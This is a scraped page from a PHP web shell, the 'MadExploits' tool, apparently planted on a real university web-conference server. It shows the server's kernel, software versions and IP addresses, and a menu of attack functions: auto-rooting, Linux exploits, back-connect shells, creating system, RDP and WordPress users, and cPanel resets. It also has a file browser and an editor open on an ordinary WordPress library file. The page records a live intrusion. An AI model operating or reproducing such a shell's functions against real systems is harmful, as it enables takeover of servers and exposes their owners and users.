Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.190.239.38
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-includes /
Requests /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxrwxr-x
Cookie
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Proxy
[ DIR ]
drwxrwxr-x
Response
[ DIR ]
drwxrwxr-x
Transport
[ DIR ]
drwxrwxr-x
Utility
[ DIR ]
drwxrwxr-x
Auth.php
860
B
-rw-rw-r--
Autoload.php
9.12
KB
-rw-rw-r--
Capability.php
652
B
-rw-rw-r--
Cookie.php
14.75
KB
-rw-rw-r--
Exception.php
1.09
KB
-rw-rw-r--
HookManager.php
709
B
-rw-rw-r--
Hooks.php
2.96
KB
-rw-rw-r--
IdnaEncoder.php
12.14
KB
-rw-rw-r--
Ipv6.php
5.51
KB
-rw-rw-r--
Iri.php
28.93
KB
-rw-rw-r--
Port.php
1.47
KB
-rw-rw-r--
Proxy.php
867
B
-rw-rw-r--
Requests.php
33.2
KB
-rw-rw-r--
Response.php
4.18
KB
-rw-rw-r--
Session.php
8.89
KB
-rw-rw-r--
Ssl.php
5.3
KB
-rw-rw-r--
Transport.php
1.51
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Proxy.php
<?php /** * Proxy connection interface * * @package Requests\Proxy * @since 1.6 */ namespace WpOrg\Requests; use WpOrg\Requests\Hooks; /** * Proxy connection interface * * Implement this interface to handle proxy settings and authentication * * Parameters should be passed via the constructor where possible, as this * makes it much easier for users to use your provider. * * @see \WpOrg\Requests\Hooks * * @package Requests\Proxy * @since 1.6 */ interface Proxy { /** * Register hooks as needed * * This method is called in {@see \WpOrg\Requests\Requests::request()} when the user * has set an instance as the 'auth' option. Use this callback to register all the * hooks you'll need. * * @see \WpOrg\Requests\Hooks::register() * @param \WpOrg\Requests\Hooks $hooks Hook system */ public function register(Hooks $hooks); }
Close